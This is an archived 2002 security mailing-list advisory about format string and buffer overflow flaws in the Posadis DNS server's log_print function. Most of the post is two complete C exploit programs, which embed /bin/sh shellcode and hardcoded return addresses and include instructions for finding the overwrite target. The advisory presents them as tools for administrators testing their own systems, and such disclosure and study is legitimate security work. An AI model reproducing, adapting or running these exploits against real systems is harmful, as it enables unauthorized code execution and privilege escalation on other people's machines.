[EXPL] Posadis Format String and Buffer Overflow Exploit Codes
From: support@securiteam.comDate: 04/17/02
- Previous message: support@securiteam.com: "[UNIX] DDate Proof Of Concept Exploit and Bug details"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Wed, 17 Apr 2002 20:04:57 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Posadis Format String and Buffer Overflow Exploit Codes
------------------------------------------------------------------------
SUMMARY
<http://sourceforge.net/projects/posadis/> Posadis DNS server is a simple
DNS server designed for Win32 and Linux, which will support administration
through a web interface. The log_print function is badly written allowing
an attacker to cause a format string vulnerability in the product or
overflow an internal buffer causing a buffer overflow vulnerability, both
these allow remote code execution. The following are exploit codes that
can be used by administrators to test their for the mentioned
vulnerabilities.
DETAILS
Exploit:
/* local posadis m5pre2 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
* The formatstring bug (discovered by kkr) is fixed in the log_print
* function in m5pre2. However, there exists an unchecked buffer in
* m5pre2 and prior, that can be exploited too.
* ------------------------------------------------------------------
*/
#include <stdio.h>
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main ()
{
unsigned long ret = 0xbffff550;
char buf[4068];
int i=0;
memset(buf, 0x90, sizeof(buf));
for (0; i < sizeof(shellcode) - 1;i++) {
buf[4000+i] = shellcode[i];
}
buf[4063] = (ret & 0x000000ff);
buf[4064] = (ret & 0x0000ff00) >> 8;
buf[4065] = (ret & 0x00ff0000) >> 16;
buf[4066] = (ret & 0xff000000) >> 24;
buf[4067] = '\0';
printf("ret: 0x%x\n",ret);
execl("./posadis", "posadis", buf, NULL);
return 0;
}
/* local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
*
*
* to find the retloc:
* objdump -R posa-dis | grep syslog
* 08063ddc R_386_JUMP_SLOT syslog
*
*/
#include <stdio.h>
#define RETLOC 0x08063ddc
#define RET 0xbffffdac
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
padding(int write_byte, int already_written)
{
int padding;
write_byte += 0x100;
already_written %= 0x100;
padding = (write_byte - already_written) % 0x100;
if (padding < 10)
padding += 0x100;
return padding;
}
int
main()
{
char format[512],
writecode[8],
egg[1024],
*ptr;
int already_written = 0xfc,
tmp,
i;
long *addr_ptr;
ptr = egg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[1024 - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
strcpy(format, "jjj");
ptr = format+3;
addr_ptr = (long *) ptr;
for (i = 0; i < 4; i++) {
*(addr_ptr++) = RETLOC + i;
*(addr_ptr++) = 0xb0efb0ef;
}
*(ptr + 32) = 0;
for (i = 0; i < 18; i++)
strcat(format, "%08x.");
for (i = 0; i <= 24; i += 8) {
tmp = padding((RET >> i) & 0xff, already_written) + 10;
sprintf(writecode, "%%%du%%n", tmp);
strcat(format, writecode);
already_written += tmp;
}
printf("local posadis m5pre1 exploit by eSDee of Netric -
(www.netric.org)\n");
printf("------------------------------------------------------------------\n");
printf("return address : 0x%08x\n",RET);
printf("return location: 0x%08x\n\n",RETLOC);
execl("./posadis","posadis",format,NULL);
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:eSDee@netric.org> eSDee.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] DDate Proof Of Concept Exploit and Bug details"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
